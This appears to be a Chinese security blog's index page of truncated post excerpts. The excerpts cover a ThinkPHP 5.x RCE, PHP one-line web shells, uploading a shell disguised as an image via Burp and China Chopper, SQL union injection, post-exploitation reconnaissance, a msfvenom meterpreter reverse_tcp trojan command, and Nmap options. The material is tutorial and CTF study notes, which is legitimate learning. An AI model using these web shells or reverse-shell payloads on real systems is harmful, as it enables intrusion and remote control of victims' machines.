weixin_41038905的博客

漏洞标志影响版本ThinkPHP 5.0.x ~ 5.0.23ThinkPHP 5.1.x ~ 5.1.31漏洞利用先查看版本号。在网址上随意输入一个不存在的模块 地址：可以看到，thinkphp 版本为 5.0.20查看信息漏洞利用大致原理：漏洞程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。详情参考：https://www.cnblogs.com/backlion/p/10106676.html初步利用代码如下：index.php?s..

Web总结：1.网页源代码查看即使浏览器不设置 直接访问此链接也可以看到原代码，后来发现其他网页也是如此， 所以破解方法有三个一个是直接F12查看元素可以看到一个是设置浏览器关闭js一个是直接在链接前加view-source   注意看原代码的链接：view-source:http://159.138.137.79:55803/2.直接在链接后加/robots.txt，这边记录了爬虫...

Php一句话木马：<?php eval($_post['cmd']);?>一句话：<?php eval($_post['cmd']);?>代码执行函数eval,assert,preg_replace, array_map等命令执行函数system,exec, passthru 等根据waf白名单拼接字符串?c=$pi=(is_nan^(6).(...

中国菜刀下载地址，试了好几个版本的就这个好用：https://pan.baidu.com/share/link?shareid=871753024&uk=388464620上传一句话木马：<?php @eval($_POST['hacker'])?>将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php通过菜刀连接：在空白位置右键-》添加...

简介SQL注入漏洞的原理是由于开发者在编写操作数据库代码时，直接将外部可控的参数拼接到SQL语句中，没有经过任何过滤或过滤不严谨，导致攻击者可以使恶意语句在数据库引擎中执行。Union注入利用内置函数爆数据库信息及相关信息version()database()user()current_user()@@datadir数据库路径@@basedir mysql安装路径@@ver...

渗透测试过程中不到万不得已不要用爆破，会留下大量的证据假设我们已经到目标的内网的某个设备上了，我们可以做什么呢？1、肯定是要做权限维持，为以后的渗透先铺好路，要不然很容易就会前功尽弃2、了解目标系统的详细版本信息wmic OS get Caption,CSDVersion,OSArchitecture,Version3.查看当前机器处于什么网络环境中ipconfig/all &amp...

利用kali 制作木马root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f exe -o /root/test.exe 生成一个木马程序test.exe，没有添加任何免杀，很容易被安全软件检测出，这里先介绍一下...

Kali上没有中文输入法，安装搜狗输入法的过程总是报错，也是服了首先下载搜狗输入法使用chmod +x sogoupinyin***.deb给安装包添加可执行权限这里可以看到添加权限之后颜色会变化然后使用安装deb包的命令进行安装dpkg -i sogoupinyin.deb结果很不幸报错看一下错误提示，关于fcitx的一些东西好像是没有安装，fcitx是一个输入法系统，sogo...

Burpsuite的超详细安装教程Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。接下来我来给大家详细介绍一下如何在WINDOWS平台下安装Burpsuite。一，首先我们要配置JAVA环境因为burpsu...

简介：Nmap（Network Mapper） 是一款支持各种操作系统的开源网络扫描工具。主要用来进行主机发现、端口扫描，并通过端口扫描推断运行系统以及运行软件版本。-sL 简单扫描列表目标-sP: Ping Scan - disable port scan-n 取消域名解析发送4种不同类型的包去探测，只要收到其中任何一种返回包，就可以判定主机是打开的ICMP协议 请求回显包TCP协...